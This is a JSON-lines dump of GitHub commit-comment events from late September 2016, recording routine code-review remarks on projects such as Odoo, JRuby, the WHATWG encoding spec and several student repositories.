{"id":"4616704736","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"sindresorhus/path-key"},"payload":{"comment":{"id":19169668,"position":18,"line":12,"path":"index.js","commit_id":"c71c58a779e8c323c68b86ab289c6978026db643","created_at":"2016-09-26T09:33:28Z","updated_at":"2016-09-26T09:33:28Z","body":"`Object.keys(env).find()`"}},"created_at":"2016-09-26T09:33:28Z"}
{"id":"4616708969","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169673,"position":37,"line":28,"path":"GitTodo.sublime-settings","commit_id":"1c022fa72f798dda48e38fb06df2a812097512b3","created_at":"2016-09-26T09:34:22Z","updated_at":"2016-09-26T09:34:22Z","body":"well *gg* I would change your password I guess 🚨 "}},"created_at":"2016-09-26T09:34:22Z"}
{"id":"4616709876","type":"CommitCommentEvent","actor":{"login":"ncraike"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169675,"position":4,"line":8,"path":"CHANGES.md","commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:34:33Z","updated_at":"2016-09-26T09:34:33Z","body":"All good. Figured as much. Just didn't want it to cause more confusion for other readers."}},"created_at":"2016-09-26T09:34:33Z"}
{"id":"4616713754","type":"CommitCommentEvent","actor":{"login":"girvo"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169688,"position":null,"line":null,"path":null,"commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:35:22Z","updated_at":"2016-09-26T09:35:22Z","body":"Oh excellent, that's good news! I've tried to avoid more advanced constructs, and the new modules make it a bit clearer I think. Did you see anywhere that is missing comments that could need them?\n\nSent from my iPhone\n\n> On 26 Sep. 2016, at 7:33 pm, Nathan Craike <notifications@github.com> wrote:\n> \n> The nim code looks good. And surprisingly I can make sense of it without much trouble at all.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-26T09:35:22Z"}
{"id":"4616720180","type":"CommitCommentEvent","actor":{"login":"ncraike"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169699,"position":4,"line":8,"path":"CHANGES.md","commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:36:45Z","updated_at":"2016-09-26T09:36:45Z","body":"See PR #13 "}},"created_at":"2016-09-26T09:36:45Z"}
{"id":"4616726279","type":"CommitCommentEvent","actor":{"login":"harrygfox"},"repo":{"name":"tachyons-css/tachyons"},"payload":{"comment":{"id":19169710,"position":42,"line":510,"path":"css/tachyons.css","commit_id":"17e8af3936c8af421dbc50af62e8ce4e81cef096","created_at":"2016-09-26T09:38:04Z","updated_at":"2016-09-26T09:38:04Z","body":"@mrmrs \r\nIs `0px` more browser compatible than `0`? Is it for consistency / readability purposes?"}},"created_at":"2016-09-26T09:38:04Z"}
{"id":"4616726503","type":"CommitCommentEvent","actor":{"login":"justinfx"},"repo":{"name":"wkschwartz/pigosat"},"payload":{"comment":{"id":19169711,"position":4,"line":297,"path":"pigosat.go","commit_id":"185788d2cb37f458bf829d238047bb341c471816","created_at":"2016-09-26T09:38:07Z","updated_at":"2016-09-26T09:38:07Z","body":"Why was this change necessary? Res() is a public function that acquires its own read lock. Do we need to lock twice? I always thought that it is best to not call functions which in turn acquire the lock that was already acquired in the calling function. "}},"created_at":"2016-09-26T09:38:07Z"}
{"id":"4616726768","type":"CommitCommentEvent","actor":{"login":"tyoshino"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169713,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:38:10Z","updated_at":"2016-09-26T09:38:10Z","body":"Yeah!\r\n\r\n> I guess we couldn't just add {writable, readable} to the TextEncoder instance?\r\n\r\nIf we make the existing encode() and transform stream interface co-exist, we will either have them work independently or work as two different data input paths for a single processing. I feel that former approach should be implemented in the ricea's way. I can't come up with clear and useful behavior of encode() for the latter. It could be either syntax sugar of writer.write() while there's an active writer, but it doesn't match the current definition of encode(). Making it bypass writer lock sounds bad in terms of the streams design philosophy."}},"created_at":"2016-09-26T09:38:10Z"}
{"id":"4616727935","type":"CommitCommentEvent","actor":{"login":"lukosanthropos"},"repo":{"name":"dblencowe/tfpdf"},"payload":{"comment":{"id":19169716,"position":3,"line":2,"path":"composer.json","commit_id":"62318e643e03b85360587e46690ee84ec0b1a3fd","created_at":"2016-09-26T09:38:25Z","updated_at":"2016-09-26T09:38:25Z","body":"So you own this library now @dblencowe ? (if not, you don't wanna change this)"}},"created_at":"2016-09-26T09:38:25Z"}
{"id":"4616728863","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19169717,"position":28,"line":28,"path":"addons/payment/models/account_journal.py","commit_id":"2f62eb2b2e6f86cb8781d2de3a3d2b2ad4416118","created_at":"2016-09-26T09:38:36Z","updated_at":"2016-09-26T09:38:36Z","body":"write() works in recordsets, so there's no need to loop there.\r\n\r\nif bank_journals:\r\n    bank_journals.write({'inbound_payment_method_ids': [(4, electronic.id, None)]})"}},"created_at":"2016-09-26T09:38:36Z"}
{"id":"4616731437","type":"CommitCommentEvent","actor":{"login":"RkEclair"},"repo":{"name":"RkEclair/RkEclair.github.io"},"payload":{"comment":{"id":19169722,"position":null,"line":null,"path":null,"commit_id":"b6c5d59fd8dae204147a4e8ed843e05bfac02eea","created_at":"2016-09-26T09:39:11Z","updated_at":"2016-09-26T09:39:11Z","body":"Typo found ./index.html"}},"created_at":"2016-09-26T09:39:11Z"}
{"id":"4616736898","type":"CommitCommentEvent","actor":{"login":"ricea"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169733,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:40:17Z","updated_at":"2016-09-26T09:40:17Z","body":"@jakearchibald That's an interesting alternative. ```stream.pipeThrough(new TextEncoder())``` is a very attractive interface.\r\n\r\nI have two concerns I'd like more feedback on:\r\n\r\n1. Spec complexity. The encoding spec would end up with quite a lot of text basically copy-and-pasted from the definition of TransformStream in the streams spec. Maybe this could be mitigated by \"exporting\" the necessary methods from the streams spec so that they could be reused in the encoding spec?\r\n1. Implementation optimisation cost. I expect implementations will want to optimise TransformStream to bypass the cost of flow-control tracking and buffer-juggling where possible. But if TextEncoder doesn't use TransformStream directly, then it could easily fall through the cracks or require duplicate optimisation effort."}},"created_at":"2016-09-26T09:40:17Z"}
{"id":"4616737907","type":"CommitCommentEvent","actor":{"login":"QuickJack"},"repo":{"name":"fpga-logi/logi-kernel"},"payload":{"comment":{"id":19169739,"position":null,"line":null,"path":null,"commit_id":"d66e928312a52e3a328adc41bef90148201c981c","created_at":"2016-09-26T09:40:30Z","updated_at":"2016-09-26T09:40:30Z","body":"This change destroys the ability to auto detect the correct DMA engine to use. It results in #23. I will soon push some commits which resolve that issue."}},"created_at":"2016-09-26T09:40:30Z"}
{"id":"4616737989","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19169740,"position":4,"line":63,"path":"truffle/src/main/java/org/jruby/truffle/language/globals/GlobalVariables.java","commit_id":"f85827b3f03b5a765435e237a79eef1e2531accb","created_at":"2016-09-26T09:40:31Z","updated_at":"2016-09-26T09:40:31Z","body":"The name below was due to returning only DynamicObject.\r\nI think this should be `keys()` or `keySet()` (like in Map)."}},"created_at":"2016-09-26T09:40:31Z"}
{"id":"4616740008","type":"CommitCommentEvent","actor":{"login":"qinsvn"},"repo":{"name":"qinsvn/2016repository"},"payload":{"comment":{"id":19169745,"position":2,"line":2,"path":"text.xml","commit_id":"a839f3e31bddbddf7af0783335d5f57325a65532","created_at":"2016-09-26T09:40:57Z","updated_at":"2016-09-26T09:40:57Z","body":"sdf "}},"created_at":"2016-09-26T09:40:57Z"}
{"id":"4616740112","type":"CommitCommentEvent","actor":{"login":"justinfx"},"repo":{"name":"wkschwartz/pigosat"},"payload":{"comment":{"id":19169746,"position":4,"line":297,"path":"pigosat.go","commit_id":"185788d2cb37f458bf829d238047bb341c471816","created_at":"2016-09-26T09:40:58Z","updated_at":"2016-09-26T09:40:58Z","body":"Extra comment... I think of it like this... If Res is public and acquires its own lock, then it is also free to release the read lock and try to acquire the write lock. Do we deadlock? \r\nMy opinion is that either the acquire in the calling function should be moved back below again, or an unexported res() should be created which does not lock, and Res() can lock and call it. "}},"created_at":"2016-09-26T09:40:58Z"}
{"id":"4616742398","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19169751,"position":11,"line":11,"path":"addons/payment/models/account_journal.py","commit_id":"2f62eb2b2e6f86cb8781d2de3a3d2b2ad4416118","created_at":"2016-09-26T09:41:25Z","updated_at":"2016-09-26T09:41:25Z","body":"where is that function used?"}},"created_at":"2016-09-26T09:41:25Z"}
{"id":"4616749012","type":"CommitCommentEvent","actor":{"login":"jrudolph"},"repo":{"name":"kubukoz/akka-http"},"payload":{"comment":{"id":19169763,"position":5,"line":209,"path":"docs/src/test/scala/docs/http/scaladsl/HttpClientExampleSpec.scala","commit_id":"d52285ca69e4ffd1e6d92a858c0574b8fbd98e0d","created_at":"2016-09-26T09:42:44Z","updated_at":"2016-09-26T09:42:44Z","body":"I wonder if that makes sense at all. What do we want to actually print in that case? Maybe a string representation of the body? Then, it should be more like this:\r\n\r\n```scala\r\nentity.dataBytes.runFold(ByteString.empty)(_ ++ _).foreach { body =>\r\n  log.info(\"Got response, body: \" + body.utf8String)\r\n}\r\n```"}},"created_at":"2016-09-26T09:42:44Z"}
{"id":"4616750171","type":"CommitCommentEvent","actor":{"login":"dmming1993"},"repo":{"name":"dmming1993/git-funny-dmming"},"payload":{"comment":{"id":19169765,"position":null,"line":null,"path":null,"commit_id":"83f5202e1c248bc22cf2eba865404f5a76ebe1d8","created_at":"2016-09-26T09:42:58Z","updated_at":"2016-09-26T09:42:58Z","body":"what do you want say?\r\n"}},"created_at":"2016-09-26T09:42:58Z"}
{"id":"4616750715","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169767,"position":26,"line":30,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:43:06Z","updated_at":"2016-09-26T09:43:06Z","body":"I would declare them as \r\n\r\n`GIT_SHOW_ORIGIN = \"git remote show origin -n\"`\r\n`GIT_SHOW_ORIGIN_REGEX = \"(.+: )*([\\w\\d\\.]+)[:|@]/?/?(.*)\"`\r\n\r\njust to have these separated in the head"}},"created_at":"2016-09-26T09:43:06Z"}
{"id":"4616751498","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169769,"position":69,"line":70,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:43:14Z","updated_at":"2016-09-26T09:43:14Z","body":"nice ! :D"}},"created_at":"2016-09-26T09:43:14Z"}
{"id":"4616756675","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19169779,"position":null,"line":null,"path":null,"commit_id":"7a286c12195b639b0fe5d06c01ea2dd24862d3ca","created_at":"2016-09-26T09:44:18Z","updated_at":"2016-09-26T09:44:18Z","body":"[Code coverage](https://160-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-26T09:44:18Z"}
{"id":"4616757175","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169780,"position":130,"line":109,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:44:23Z","updated_at":"2016-09-26T09:44:23Z","body":"👍 "}},"created_at":"2016-09-26T09:44:23Z"}
{"id":"4616757612","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19169782,"position":14,"line":14,"path":"addons/payment/models/account_journal.py","commit_id":"2f62eb2b2e6f86cb8781d2de3a3d2b2ad4416118","created_at":"2016-09-26T09:44:28Z","updated_at":"2016-09-26T09:44:28Z","body":"this is correct, but for a  bit error-prone when translating because people have to pay attention to spaces and formatting. I'd rather do\r\n```python\r\n'name': self.name + ': ' + _(\"Check Number Sequence\"),\r\n```"}},"created_at":"2016-09-26T09:44:28Z"}
{"id":"4616758503","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"resin-io/qemu"},"payload":{"comment":{"id":19169785,"position":null,"line":null,"path":null,"commit_id":"782e5bb77014ff136f7bb6133a911e5f53e914a7","created_at":"2016-09-26T09:44:39Z","updated_at":"2016-09-26T09:44:39Z","body":"https://github.com/pld-linux/qemu/commit/0fa62ee26bf11898acf9b1248ee153d5790f699b\r\n\r\ni've changed your code too to use `safe_execve` instead of `execve` as well. didn't pay much attention what was the upstream change about :)"}},"created_at":"2016-09-26T09:44:39Z"}
{"id":"4616766174","type":"CommitCommentEvent","actor":{"login":"ricea"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169797,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:46:09Z","updated_at":"2016-09-26T09:46:09Z","body":"What @tyoshino said reminded me why I made .stream() a static method rather than an object method. TextEncoder is okay because it's stateless, but using a single TextDecoder object as a stream transform while also calling the .decode() method is a recipe for confusion."}},"created_at":"2016-09-26T09:46:09Z"}
{"id":"4616768497","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169803,"position":259,"line":229,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:46:35Z","updated_at":"2016-09-26T09:46:35Z","body":"👍 model ftw :D"}},"created_at":"2016-09-26T09:46:35Z"}
{"id":"4616769240","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19169804,"position":null,"line":null,"path":null,"commit_id":"4031842d3cdb71d6a38c360a2664f25627ab4a90","created_at":"2016-09-26T09:46:45Z","updated_at":"2016-09-26T09:46:45Z","body":"[Code coverage](https://161-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-26T09:46:45Z"}
{"id":"4616769621","type":"CommitCommentEvent","actor":{"login":"TTOJlTOPA"},"repo":{"name":"DenisBelobrotski/lab4"},"payload":{"comment":{"id":19169806,"position":null,"line":null,"path":null,"commit_id":"6e68ce2ed3695417ba5edf0629e3b00f3a18f28c","created_at":"2016-09-26T09:46:49Z","updated_at":"2016-09-26T09:46:49Z","body":"sos(sqrt(-1)) 3.14sos"}},"created_at":"2016-09-26T09:46:49Z"}
{"id":"4616773419","type":"CommitCommentEvent","actor":{"login":"simha476"},"repo":{"name":"simha476/Project"},"payload":{"comment":{"id":19169816,"position":4,"line":4,"path":"afile.txt","commit_id":"2f70b82dd886b54c2d495dfc33d2e570e92e517a","created_at":"2016-09-26T09:47:33Z","updated_at":"2016-09-26T09:47:33Z","body":"committed by me"}},"created_at":"2016-09-26T09:47:33Z"}
{"id":"4616775890","type":"CommitCommentEvent","actor":{"login":"geekbrother"},"repo":{"name":"geeksteam/smpp-sender"},"payload":{"comment":{"id":19169821,"position":27,"line":27,"path":"sender.go","commit_id":"f9a8e8dfed3819cc9479c3e38626b2ddf33cd793","created_at":"2016-09-26T09:48:02Z","updated_at":"2016-09-26T09:48:02Z","body":"Phone country code can be from 1 to 3 digits.  See https://en.wikipedia.org/wiki/List_of_country_calling_codes"}},"created_at":"2016-09-26T09:48:02Z"}
{"id":"4616777150","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19169822,"position":5,"line":580,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"febe6a1f26c6ca3d95962aa3a7cef5fe2bb24389","created_at":"2016-09-26T09:48:16Z","updated_at":"2016-09-26T09:48:16Z","body":"But this won't call the `allocate` methods defined in various core classes.\r\nMaybe this is OK because `ruby_class` is always a `T_DATA` and so a different hierarchy?\r\nIn that case it would be good to check.\r\nI think a primitive called with `Truffle.invoke_primitive` might work better here."}},"created_at":"2016-09-26T09:48:16Z"}
{"id":"4616780029","type":"CommitCommentEvent","actor":{"login":"Stibbons"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19169826,"position":8,"line":202,"path":"docs/submitting-applications.md","commit_id":"7db55faa70ebbd157e9ef0ee678bd972c2b5c32a","created_at":"2016-09-26T09:48:50Z","updated_at":"2016-09-26T09:48:50Z","body":"standalone mode as well"}},"created_at":"2016-09-26T09:48:50Z"}
{"id":"4616781446","type":"CommitCommentEvent","actor":{"login":"Stibbons"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19169828,"position":19,"line":213,"path":"docs/submitting-applications.md","commit_id":"7db55faa70ebbd157e9ef0ee678bd972c2b5c32a","created_at":"2016-09-26T09:49:09Z","updated_at":"2016-09-26T09:49:09Z","body":"answered on the PR comments"}},"created_at":"2016-09-26T09:49:09Z"}
{"id":"4616782752","type":"CommitCommentEvent","actor":{"login":"race604"},"repo":{"name":"race604/react-native-viewpager"},"payload":{"comment":{"id":19169829,"position":null,"line":null,"path":null,"commit_id":"08b9a4bda68a08b131fb86d3afb7fd528594ca94","created_at":"2016-09-26T09:49:27Z","updated_at":"2016-09-26T09:49:27Z","body":"Done.\r\nThanks for this PR and deeply sorry for late merge."}},"created_at":"2016-09-26T09:49:27Z"}
{"id":"4616787070","type":"CommitCommentEvent","actor":{"login":"hipkiss91"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169841,"position":259,"line":229,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:50:22Z","updated_at":"2016-09-26T09:50:22Z","body":"Thanks for all the feedback :). Really appreciate it. It feels a lot more robust now lol, don't know what I was playing at before haha. Still progress is progress :)"}},"created_at":"2016-09-26T09:50:22Z"}
{"id":"4616789292","type":"CommitCommentEvent","actor":{"login":"shagabutdinov"},"repo":{"name":"shagabutdinov/dotfiles"},"payload":{"comment":{"id":19169845,"position":61,"line":452,"path":"user/bin/ushell-env","commit_id":"d9c123955e2148a4a3bf3694c178d1dd599958aa","created_at":"2016-09-26T09:50:50Z","updated_at":"2016-09-26T09:50:50Z","body":"They publish PR link to stdout. All you have to do is to setup shortcut that open links (I have `alt+q`)."}},"created_at":"2016-09-26T09:50:50Z"}
{"id":"4616796509","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19169850,"position":6,"line":11,"path":"movie.rb","commit_id":"fdeef04485ac04190a9c1af57d87526168c60a22","created_at":"2016-09-26T09:52:20Z","updated_at":"2016-09-26T09:52:20Z","body":"Лучше бы её таки в настоящую дату превращать (`Date.parse`), а не в массив каких-то штук. Поставь себя на место пользователя либы: `movies.first.date # => [\"2006\", \"05\", \"11\"]` — чо????"}},"created_at":"2016-09-26T09:52:20Z"}
{"id":"4616797944","type":"CommitCommentEvent","actor":{"login":"elvisciotti"},"repo":{"name":"ministryofjustice/opg-digi-deps-client"},"payload":{"comment":{"id":19169853,"position":null,"line":null,"path":null,"commit_id":"dd81758ca352cf3612230880ed559e4233f74a08","created_at":"2016-09-26T09:52:37Z","updated_at":"2016-09-26T09:52:37Z","body":"@Biggsen Report (not ODR) sending has the same declaration page (https://github.com/ministryofjustice/opg-digi-deps-client/blob/master/src/AppBundle/Resources/views/Report/Report/declaration.html.twig). There is no warning there. I'd ask if the warning is needed there too and keep the pages aligned accordingly"}},"created_at":"2016-09-26T09:52:37Z"}
{"id":"4616801458","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19169859,"position":null,"line":null,"path":null,"commit_id":"fc36327fbffef646806c925d3d5d2aa166fa5125","created_at":"2016-09-26T09:53:18Z","updated_at":"2016-09-26T09:53:18Z","body":"Ugh, it was ceylon/ceylon#6529"}},"created_at":"2016-09-26T09:53:18Z"}
{"id":"4616804313","type":"CommitCommentEvent","actor":{"login":"DenisBelobrotski"},"repo":{"name":"DenisBelobrotski/lab4"},"payload":{"comment":{"id":19169863,"position":null,"line":null,"path":null,"commit_id":"6e68ce2ed3695417ba5edf0629e3b00f3a18f28c","created_at":"2016-09-26T09:53:53Z","updated_at":"2016-09-26T09:53:53Z","body":"Кек лол😛"}},"created_at":"2016-09-26T09:53:53Z"}
{"id":"4616807340","type":"CommitCommentEvent","actor":{"login":"mjafin"},"repo":{"name":"AstraZeneca-NGS/VarDict"},"payload":{"comment":{"id":19169867,"position":null,"line":null,"path":null,"commit_id":"5f883061263a0de2575416a728cb2b3e7fa82b15","created_at":"2016-09-26T09:54:30Z","updated_at":"2016-09-26T09:54:30Z","body":"@jabbarish Is VarDictJava how far behind these fixes to Perl?"}},"created_at":"2016-09-26T09:54:30Z"}
{"id":"4616813577","type":"CommitCommentEvent","actor":{"login":"hipkiss91"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169890,"position":37,"line":28,"path":"GitTodo.sublime-settings","commit_id":"1c022fa72f798dda48e38fb06df2a812097512b3","created_at":"2016-09-26T09:55:42Z","updated_at":"2016-09-26T09:55:42Z","body":"Yea, already done lol. I noticed as soon as I committed. #notDoingThatAgain"}},"created_at":"2016-09-26T09:55:42Z"}
{"id":"4616816656","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19169901,"position":null,"line":null,"path":null,"commit_id":"ff08b658e9ec60ac7d64d0d6450922502e1d4b03","created_at":"2016-09-26T09:56:17Z","updated_at":"2016-09-26T09:56:17Z","body":"We could use the `object_ivar_set` primitive and the get variant to support this without renaming."}},"created_at":"2016-09-26T09:56:17Z"}
{"id":"4616817353","type":"CommitCommentEvent","actor":{"login":"pankajsinha4u"},"repo":{"name":"pankajsinha4u/HelloWorld"},"payload":{"comment":{"id":19169904,"position":null,"line":null,"path":null,"commit_id":"4a5033daec7df960534504958945d3411e89594c","created_at":"2016-09-26T09:56:24Z","updated_at":"2016-09-26T09:56:24Z","body":"SDSADA"}},"created_at":"2016-09-26T09:56:24Z"}
{"id":"4616821682","type":"CommitCommentEvent","actor":{"login":"chilimatic"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169912,"position":259,"line":229,"path":"GitTodo.py","commit_id":"4c37f46ba5f0be205b42be5a771b534790deab33","created_at":"2016-09-26T09:57:17Z","updated_at":"2016-09-26T09:57:17Z","body":"it looks good ! :)"}},"created_at":"2016-09-26T09:57:17Z"}
{"id":"4616822258","type":"CommitCommentEvent","actor":{"login":"geekard"},"repo":{"name":"influxdata/kapacitor"},"payload":{"comment":{"id":19169916,"position":null,"line":null,"path":null,"commit_id":"2289c9dc4e2cba2af32200b84b5d47ab157ade8e","created_at":"2016-09-26T09:57:24Z","updated_at":"2016-09-26T09:57:24Z","body":"This is exactly I want!  \r\nCurrently, I have to write batch UDFs to group/aggregate/throttle alerts."}},"created_at":"2016-09-26T09:57:24Z"}
{"id":"4616824486","type":"CommitCommentEvent","actor":{"login":"atul2112"},"repo":{"name":"atul2112/AsposeTest"},"payload":{"comment":{"id":19169924,"position":null,"line":null,"path":null,"commit_id":"e0cab2d7b3a79dd3fba61726d5a2a90e417720ef","created_at":"2016-09-26T09:57:52Z","updated_at":"2016-09-26T09:57:52Z","body":"done"}},"created_at":"2016-09-26T09:57:52Z"}
{"id":"4616826553","type":"CommitCommentEvent","actor":{"login":"peterwtlee"},"repo":{"name":"arynchoong/MTech-KE-DWBA"},"payload":{"comment":{"id":19169928,"position":null,"line":null,"path":null,"commit_id":"c979ac9d71a2b68c446ad6c6fffa412d46ad0e50","created_at":"2016-09-26T09:58:16Z","updated_at":"2016-09-26T09:58:16Z","body":"Explanation:\r\nfactWeather entity:\r\nIt contains what was previously called RainTempWind, plus:\r\na) PSI: it is the same for all the weather station of the same region,\r\nb) UV Index - it is the same for all the stations on that day\r\n    UV Index actually goes by hour in the raw data, but this factWeather is for daily purpose, so have to compute the Mean, Max and Min among all the UV Index of the day.\r\n\r\ndimTime:\r\ncan either extract this info from the original RainTempWind.csv, or I think Tableau has this in-built dimension.\r\n"}},"created_at":"2016-09-26T09:58:16Z"}
{"id":"4616829574","type":"CommitCommentEvent","actor":{"login":"SitiFathimahMuhiddin"},"repo":{"name":"SitiFathimahMuhiddin/Assignment-2"},"payload":{"comment":{"id":19169935,"position":null,"line":null,"path":null,"commit_id":"bb0fb679f75a2923c23d72aeb2a2d9b7ad56af64","created_at":"2016-09-26T09:58:54Z","updated_at":"2016-09-26T09:58:54Z","body":"![img_0001](https://cloud.githubusercontent.com/assets/20385650/18830342/dea1ecd2-8412-11e6-89cb-4d538fbbdb50.jpg)\r\n"}},"created_at":"2016-09-26T09:58:54Z"}
{"id":"4616832993","type":"CommitCommentEvent","actor":{"login":"HustGuoHeng"},"repo":{"name":"HustGuoHeng/dotenvWithArray"},"payload":{"comment":{"id":19169944,"position":null,"line":null,"path":null,"commit_id":"eebdd5dc7585eb7105d763f080223dbb587c6a41","created_at":"2016-09-26T09:59:38Z","updated_at":"2016-09-26T09:59:38Z","body":"v1.0.0"}},"created_at":"2016-09-26T09:59:38Z"}
{"id":"4616833980","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"RonnyPfannschmidt/nixpkgs"},"payload":{"comment":{"id":19169946,"position":1,"line":1,"path":"pkgs/tools/security/enpass/fet-urls.sh","commit_id":"ffa3c11bbb047a31c1fd8f6e1b25b48548ef037c","created_at":"2016-09-26T09:59:52Z","updated_at":"2016-09-26T09:59:52Z","body":"its used as a way to fetch the metadata, i'd live to replace it with something more generic"}},"created_at":"2016-09-26T09:59:52Z"}
{"id":"4621206622","type":"CommitCommentEvent","actor":{"login":"QSarah"},"repo":{"name":"QSarah/Portfolio"},"payload":{"comment":{"id":19182651,"position":null,"line":null,"path":null,"commit_id":"3d8e703e2be1dc7531d0bf7bb73ff614ab4f2f51","created_at":"2016-09-27T00:00:21Z","updated_at":"2016-09-27T00:00:21Z","body":"[Tech.docx](https://github.com/QSarah/Portfolio/files/494321/Tech.docx)\r\n\r\n"}},"created_at":"2016-09-27T00:00:21Z"}
{"id":"4621207231","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"motbsitu/rho_code_challenge_1"},"payload":{"comment":{"id":19182652,"position":12,"line":9,"path":"1-variables/strings.js","commit_id":"0c1684f1ebb1116cc3f90182d1da8e2e55bb5772","created_at":"2016-09-27T00:00:31Z","updated_at":"2016-09-27T00:00:31Z","body":"Starting at 12 will remove the empty space in front of the S."}},"created_at":"2016-09-27T00:00:31Z"}
{"id":"4621212575","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"motbsitu/rho_code_challenge_1"},"payload":{"comment":{"id":19182666,"position":12,"line":14,"path":"2-loops/all_your_loops.js","commit_id":"0c1684f1ebb1116cc3f90182d1da8e2e55bb5772","created_at":"2016-09-27T00:02:05Z","updated_at":"2016-09-27T00:02:05Z","body":"Just need to remember to reset the value of `i` to 0 before entering the loop and this works perfect."}},"created_at":"2016-09-27T00:02:05Z"}
{"id":"4621217165","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"motbsitu/rho_code_challenge_1"},"payload":{"comment":{"id":19182675,"position":23,"line":25,"path":"3-conditionals/if.js","commit_id":"0c1684f1ebb1116cc3f90182d1da8e2e55bb5772","created_at":"2016-09-27T00:03:26Z","updated_at":"2016-09-27T00:03:26Z","body":"`else if` would be better here simply because the instructions on want us to account for two cases: (1) when first > second and (2) when second > first. However, it never specifies what to do when first is equal to second."}},"created_at":"2016-09-27T00:03:26Z"}
{"id":"4621221735","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19182690,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T00:04:48Z","updated_at":"2016-09-27T00:04:48Z","body":"Obviously I'm ready. (ง•̀_•́)ง\r\nJust push it~"}},"created_at":"2016-09-27T00:04:48Z"}
{"id":"4621227047","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"motbsitu/rho_code_challenge_1"},"payload":{"comment":{"id":19182718,"position":8,"line":7,"path":"4-arrays/builtins.js","commit_id":"0c1684f1ebb1116cc3f90182d1da8e2e55bb5772","created_at":"2016-09-27T00:06:18Z","updated_at":"2016-09-27T00:06:18Z","body":"`arr.splice(1, 2)` would work here because\r\n\r\n- 1 is the index we want to start at\r\n- 2 is the number of items we want to remove\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/splice"}},"created_at":"2016-09-27T00:06:18Z"}
